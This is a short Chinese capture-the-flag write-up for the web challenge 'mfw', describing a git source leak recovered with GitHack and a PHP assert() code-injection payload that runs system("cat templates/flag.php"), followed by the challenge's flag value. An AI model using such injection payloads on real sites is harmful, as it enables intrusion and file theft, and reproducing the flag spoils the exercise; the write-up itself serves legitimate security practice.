Web – mfw – WriteUp
可谁还记得我呢
发表于 2020-6-3
# mfw ## 题目  ## 工具 GitHack ## 思路 打开题目场景,检查网站,发现这样一个页面  感觉存在git泄露 )  ```php assert() 检查一个断言是否为 FALSE strpos() 函数查找字符串在另一字符串中第一次出现的位置。如果没有找到则返回False file_exists() 函数检查文件或目录是否存在。 assert()函数会将括号中的字符当成代码来执行,并返回true或false。 ``` payload:`?page=1') or system("cat templates/flag.php");//` flag:在源代码中可以看到 ```php <!--?php $FLAG="cyberpeace{183f57e79cdef0ef3daab1a5c9bddf45}"; ?--> ```
ldeus
只是一个什么都做不到的普通人
友链
Powered by CloudFlare Workers |
Github
© 2020 ldeus' Blog
